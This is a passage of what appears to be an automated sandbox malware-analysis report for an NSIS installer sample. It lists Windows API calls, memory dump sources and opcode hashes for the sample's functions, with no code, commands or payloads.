                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$Send$ClientScreen
                                                                                                                    • String ID: f
                                                                                                                    • API String ID: 41195575-1993550816
                                                                                                                    • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                    • Instruction ID: ac2b37e4453cd55ff3643614bd1240a9a451636028a825994647dd398b99f398
                                                                                                                    • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                                                                    • Instruction Fuzzy Hash: 23015E71940218BADB00DB94DD85FFEBBBCAF95711F10412BBA50F62D0D7B499018BA4
                                                                                                                    APIs
                                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E11
                                                                                                                    • wsprintfW.USER32 ref: 00402E45
                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00402E55
                                                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E67
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                    • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                    • API String ID: 1451636040-1158693248
                                                                                                                    • Opcode ID: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                                    • Instruction ID: 1bfa7b94c56a1c823be81e007cf4dd9dcc28a4463181553f30e61efe61dd31fb
                                                                                                                    • Opcode Fuzzy Hash: a591fce2f88080881549ac7e7473da6278debd618655821d08f98b44133a3158
                                                                                                                    • Instruction Fuzzy Hash: 30F0317064020CABDF206F60DD4ABEE3B69EB40319F00803AFA45B51D0DBB999598F99
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 738E121B: GlobalAlloc.KERNEL32(00000040,?,738E123B,?,738E12DF,00000019,738E11BE,-000000A0), ref: 738E1225
                                                                                                                    • GlobalFree.KERNEL32(?), ref: 738E2657
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 738E268C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2811879470.00000000738E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 738E0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2811849731.00000000738E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2811957570.00000000738E4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2812015914.00000000738E6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_738e0000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$Free$Alloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1780285237-0
                                                                                                                    • Opcode ID: c35d9899046c73b6615b1030167817078dc5f3dc71d31ff21c390c78f957cf1e
                                                                                                                    • Instruction ID: 1d172fd849dc0c12fc5fa5bb7873e4e294a69c3b4e6cf77a6df683de3677ffce
                                                                                                                    • Opcode Fuzzy Hash: c35d9899046c73b6615b1030167817078dc5f3dc71d31ff21c390c78f957cf1e
                                                                                                                    • Instruction Fuzzy Hash: BA312272184509DFD756AFE5CC84F2A77BBFB87301328466DF65A83260C7309814CB11
                                                                                                                    APIs
                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402901
                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040291D
                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00402956
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402969
                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402981
                                                                                                                    • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402995
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2667972263-0
                                                                                                                    • Opcode ID: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
                                                                                                                    • Instruction ID: fa73a2a76dd28b4b8719808dd60f9f08d060129827b0ffc87b4efdc8f5ae5e12
                                                                                                                    • Opcode Fuzzy Hash: ad54be54d1b33f2c3e643305ac3600c2e6c22dcacd93b56e136af0bf18fa41fc
                                                                                                                    • Instruction Fuzzy Hash: 3D21BFB1D00124BBCF116FA5DE48D9E7E79EF09364F10023AF9607A2E1CB794D418B98
                                                                                                                    APIs
                                                                                                                    • lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                                                                                    • wsprintfW.USER32 ref: 00404CB6
                                                                                                                    • SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                                                    • String ID: %u.%u%s%s$(7B
                                                                                                                    • API String ID: 3540041739-1320723960
                                                                                                                    • Opcode ID: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                                                                                    • Instruction ID: eedca0a42859d703ec1426aadcab00983e9769f6aa36ce56d5d2522b0312c54d
                                                                                                                    • Opcode Fuzzy Hash: c06007edea0c83b5e0931fd45a2cd42dabd82a11b0b4461ae96ab8921206da46
                                                                                                                    • Instruction Fuzzy Hash: A711D873A0412837EB00556DAC45EDE3298EB85374F254237FA26F31D1D9798C6282E8
                                                                                                                    APIs
                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsr3ABB.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsr3ABB.tmp\System.dll,00000400,?,?,00000021), ref: 004025E8
                                                                                                                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsr3ABB.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsr3ABB.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsr3ABB.tmp\System.dll,00000400,?,?,00000021), ref: 004025F3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWidelstrlen
                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsr3ABB.tmp$C:\Users\user\AppData\Local\Temp\nsr3ABB.tmp\System.dll
                                                                                                                    • API String ID: 3109718747-1161329906
                                                                                                                    • Opcode ID: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                                                                                    • Instruction ID: c13fbae436403556d6c48d38c5ac6db5007ae9437622b5a65b164b2cac9ab4a1
                                                                                                                    • Opcode Fuzzy Hash: 2504939cc2fa207c3b55af63f84819462ffbd17dbd09f8919900b39cf6f986df
                                                                                                                    • Instruction Fuzzy Hash: FB110B72A00301BADB106BB18E8999F7664AF44359F20443BF502F21D0D9FC89416B5E
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2811879470.00000000738E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 738E0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2811849731.00000000738E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2811957570.00000000738E4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2812015914.00000000738E6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_738e0000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeGlobal
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2979337801-0
                                                                                                                    • Opcode ID: f79b9d1e28ec8ef09642910392f0f4216992eb423d2c4e944c3f8eb2cc7e6ef7
                                                                                                                    • Instruction ID: 4509e5c2a5fe603a856916a21b64d2e1b29f9594ffe55d14362270611d326200
                                                                                                                    • Opcode Fuzzy Hash: f79b9d1e28ec8ef09642910392f0f4216992eb423d2c4e944c3f8eb2cc7e6ef7
                                                                                                                    • Instruction Fuzzy Hash: B451E932EC01599BDB12AFE8C585BBDB7BBEB47310B2482D9D507A3184D6709E81C791
                                                                                                                    APIs
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 738E24D6
                                                                                                                      • Part of subcall function 738E122C: lstrcpynW.KERNEL32(00000000,?,738E12DF,00000019,738E11BE,-000000A0), ref: 738E123C
                                                                                                                    • GlobalAlloc.KERNEL32(00000040), ref: 738E245C
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 738E2477
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2811879470.00000000738E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 738E0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2811849731.00000000738E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2811957570.00000000738E4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2812015914.00000000738E6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_738e0000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4216380887-0
                                                                                                                    • Opcode ID: b808c2f007307231edcc8816d50d0e3dc0f986c44dc804e18cf877e3e106c116
                                                                                                                    • Instruction ID: 679fb64e907e37413ef4149c4dd67c24098051902c90185af1a14b179e88c39b
                                                                                                                    • Opcode Fuzzy Hash: b808c2f007307231edcc8816d50d0e3dc0f986c44dc804e18cf877e3e106c116
                                                                                                                    • Instruction Fuzzy Hash: 3F41E2B208430DDFD310FFA5D844B2677BAFB8A325B108A6DF54A87591DB70A544CF61
                                                                                                                    APIs
                                                                                                                    • GetDC.USER32(?), ref: 00401DBC
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD6
                                                                                                                    • MulDiv.KERNEL32(00000000,00000000), ref: 00401DDE
                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00401DEF
                                                                                                                    • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E3E
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3808545654-0
                                                                                                                    • Opcode ID: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                                                                                    • Instruction ID: 863f18fc6204ba506076eb1f746ada73c94881a68b515e1873f2d1072bd1cf43
                                                                                                                    • Opcode Fuzzy Hash: e8aeef341752f35f6f278e7796ab08014b9ac4723c71950966d24e93e9008032
                                                                                                                    • Instruction Fuzzy Hash: 15017171944240EFE701ABB4AF8ABD97FB4AF55301F10457EE242F61E2CA7804459F2D
                                                                                                                    APIs
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,738E21EC,?,00000808), ref: 738E1635
                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,738E21EC,?,00000808), ref: 738E163C
                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,738E21EC,?,00000808), ref: 738E1650
                                                                                                                    • GetProcAddress.KERNEL32(738E21EC,00000000), ref: 738E1657
                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 738E1660
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2811879470.00000000738E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 738E0000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2811849731.00000000738E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2811957570.00000000738E4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2812015914.00000000738E6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_738e0000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1148316912-0
                                                                                                                    • Opcode ID: f5aa22e50856bf2596e3cb3fd565e27a518a4004e4fb6b032fa7a4cb693a49de
                                                                                                                    • Instruction ID: fd2b32e248f269cc444f5d1bd1bd0d808f781d4bc9504f9b244aea6fa2d0bdae
                                                                                                                    • Opcode Fuzzy Hash: f5aa22e50856bf2596e3cb3fd565e27a518a4004e4fb6b032fa7a4cb693a49de
                                                                                                                    • Instruction Fuzzy Hash: CDF01C73246538BBD66026B78C4CD9BBE9CDF8B2F6B250221F62C9229086714C01D7F1
                                                                                                                    APIs
                                                                                                                    • GetDlgItem.USER32(?,?), ref: 00401D63
                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00401D70
                                                                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D91
                                                                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D9F
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00401DAE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1849352358-0
                                                                                                                    • Opcode ID: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                                                                                    • Instruction ID: 8bbc6a183a468c813578a114873fb97f9d5ca0b11dae6a70aa3aa56fe52826a6
                                                                                                                    • Opcode Fuzzy Hash: f8e0c1d3071f89bffdcd2d635822fb410905a1edc8d2ce6cb8a0a09a78f20d84
                                                                                                                    • Instruction Fuzzy Hash: 4BF0FF72A04518AFDB01DBE4DF88CEEB7BCEB48301B14047AF641F61A0CA749D519B38
                                                                                                                    APIs
                                                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Timeout
                                                                                                                    • String ID: !
                                                                                                                    • API String ID: 1777923405-2657877971
                                                                                                                    • Opcode ID: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                                    • Instruction ID: ef61c68cd4a6cc3a6f3726d4b558d534156d03c1c75d5f5b51cfe904c604fa23
                                                                                                                    • Opcode Fuzzy Hash: 204806375d4f16312a37781d02af86e184349cdc68ded53cac09897120414cdc
                                                                                                                    • Instruction Fuzzy Hash: A621B471948209AEEF049FA5DA4AABD7BB4EB44304F14443EF605B61D0D7B845409B18
                                                                                                                    APIs
                                                                                                                    • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,004036EF,?,00000006,00000008,0000000A), ref: 00405CC3
                                                                                                                    • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403492,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,004036EF,?,00000006,00000008,0000000A), ref: 00405CCD
                                                                                                                    • lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405CDF
                                                                                                                    Strings
                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CBD
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CharPrevlstrcatlstrlen
                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                    • API String ID: 2659869361-3936084776
                                                                                                                    • Opcode ID: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                    • Instruction ID: 595fb0ef6d3bfc82903baa2f142a0de03b6946227050b98ce465681b6cfad29b
                                                                                                                    • Opcode Fuzzy Hash: cc3b6fad2320eb0d125534955cb1fe8af3638bf69e103b669ecb1462063790d4
                                                                                                                    • Instruction Fuzzy Hash: AED0A771101630AAC111AB448D04CDF63ACEE45304342003BF601B70A2CB7C1D6287FD
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                                                                                      • Part of subcall function 00405D68: CharNextW.USER32(?,?,00425F30,?,00405DDC,00425F30,00425F30,?,?,76232EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 00405D76
                                                                                                                      • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D7B
                                                                                                                      • Part of subcall function 00405D68: CharNextW.USER32(00000000), ref: 00405D93
                                                                                                                    • lstrlenW.KERNEL32(00425F30,00000000,00425F30,00425F30,?,?,76232EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76232EE0,00000000), ref: 00405E1E
                                                                                                                    • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,?,?,76232EE0,00405B1A,?,C:\Users\user\AppData\Local\Temp\,76232EE0), ref: 00405E2E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2771699394.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2771682031.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771716097.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771731717.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2771986843.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                    • String ID: 0_B
                                                                                                                    • API String ID: 3248276644-2128305573
                                                                                                                    • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                                    • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                                                                                    • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
